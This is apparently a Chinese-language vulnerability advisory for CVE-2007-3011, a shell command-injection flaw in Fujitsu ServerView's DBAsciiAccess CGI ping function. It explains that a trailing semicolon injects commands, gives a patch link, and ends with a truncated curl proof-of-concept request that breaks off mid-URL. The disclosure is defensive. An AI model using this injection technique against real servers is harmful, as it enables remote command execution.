BUGTRAQ ID: 24762
CVE(CAN) ID: CVE-2007-3011
ServerView是用于进行自动分析和版本维护的资产管理工具。
ServerView的Web接口处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程的权限执行任意命令。
DBAsciiAccess CGI脚本提供了ping功能,该脚本Parameterlist参数的Servername子参数给出了所要ping的IP地址,但没有对这个IP地址执行任何检查。如果在IP后添加了拖尾分号,攻击者就可以注入任意shell命令并以Web服务器进程的权限执行。
Fujitsu ServerView < 4.50.09
临时解决方法:
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://support.fujitsu-siemens.com/Download/ShowDescription.asp?SoftwareGUID=D1ED76B7-FB37-4375-8744-8E6D5CFDC87F” target=“_blank”>http://support.fujitsu-siemens.com/Download/ShowDescription.asp?SoftwareGUID=D1ED76B7-FB37-4375-8744-8E6D5CFDC87F</a>
curl
"http://www.example.com/cgi-bin/ServerView/
SnmpView/DBAsciiAccess
?SSL=
&Applicat